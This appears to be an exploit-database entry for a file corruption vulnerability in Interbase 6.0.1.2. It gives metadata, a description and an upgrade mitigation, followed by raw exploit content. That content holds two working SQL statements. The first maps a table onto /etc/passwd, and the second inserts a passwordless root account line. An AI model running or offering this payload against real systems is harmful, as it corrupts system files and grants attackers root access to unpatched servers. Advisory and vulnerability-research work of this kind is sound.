header-logo
Suggest Exploit
vendor:
Interbase
by:
SecurityFocus
8.8
CVSS
HIGH
Arbitrary File Corruption
20
CWE
Product Name: Interbase
Affected Version From: Interbase 6.0.1.2
Affected Version To: Interbase 6.0.1.2
Patch Exists: YES
Related CWE: CVE-2002-0649
CPE: o:borland:interbase
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2002

Arbitrary File Corruption

Interbase is vulnerable to arbitrary file corruption due to insufficient checks when creating or manipulating external databases. An attacker can exploit this vulnerability by creating a table with an external file path pointing to a system file, such as '/etc/passwd', and then inserting malicious data into the table. This will result in the corruption of the system file.

Mitigation:

Upgrade to Interbase 6.0.1.3 or later.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7291/info

A vulnerability has been reported for Interbase that may result in the corruption of arbitrary system files. The vulnerability exists due to insufficient checks performed when creating or manipulating external databases. 

create table test external '/etc/passwd' (id char(80));
insert into test values('r00t::0:0:root:/root:/bin/bash');

Navigation

Suggest Exploit

Services By CQR